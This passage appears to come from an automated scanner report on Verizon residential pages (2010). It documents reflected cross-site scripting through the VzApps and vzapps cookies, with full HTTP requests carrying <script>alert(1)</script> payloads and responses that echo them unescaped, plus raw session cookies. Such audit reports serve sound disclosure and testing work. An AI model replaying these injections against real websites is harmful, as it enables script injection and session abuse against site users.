Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXe1d4d<script>alert(1)</script>f1881c1417d; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94418
Expires: Sat, 20 Nov 2010 03:14:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:48 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe1d4d<script>alert(1)</script>f1881c1417d; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE1D4D<SCRIPT>ALERT(1)</SCRIPT>F1881C1417D </DIV>
...[SNIP]...

3.212. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 136fa'><script>alert(1)</script>a9a22c4e567 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX136fa'><script>alert(1)</script>a9a22c4e567; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94422
Expires: Sat, 20 Nov 2010 03:14:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX136fa'><script>alert(1)</script>a9a22c4e567; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX136FA'><SCRIPT>ALERT(1)</SCRIPT>A9A22C4E567 ' />
...[SNIP]...

3.213. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 50211<script>alert(1)</script>b0f40fbc4a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX50211<script>alert(1)</script>b0f40fbc4a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92840
Expires: Sat, 20 Nov 2010 00:13:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX50211<script>alert(1)</script>b0f40fbc4a; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX50211<SCRIPT>ALERT(1)</SCRIPT>B0F40FBC4A </DIV>
...[SNIP]...

3.214. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 134f1'><script>alert(1)</script>ef0109a6fac was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX134f1'><script>alert(1)</script>ef0109a6fac; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 94442
Expires: Sat, 20 Nov 2010 00:13:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX134f1'><script>alert(1)</script>ef0109a6fac; path=/
Set-Cookie: ContextInfo_Language=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Plans
</title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX134F1'><SCRIPT>ALERT(1)</SCRIPT>EF0109A6FAC ' />
...[SNIP]...

3.215. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d1ec'><script>alert(1)</script>5088e34c333 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX2d1ec'><script>alert(1)</script>5088e34c333; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74917
Expires: Sat, 20 Nov 2010 03:15:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:24 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX2d1ec'><script>alert(1)</script>5088e34c333; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2D1EC'><SCRIPT>ALERT(1)</SCRIPT>5088E34C333 ' />
...[SNIP]...

3.216. http://www22.verizon.com/Residential/HighSpeedInternet/Value/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload dd0c6<script>alert(1)</script>63779292418 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXdd0c6<script>alert(1)</script>63779292418; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; 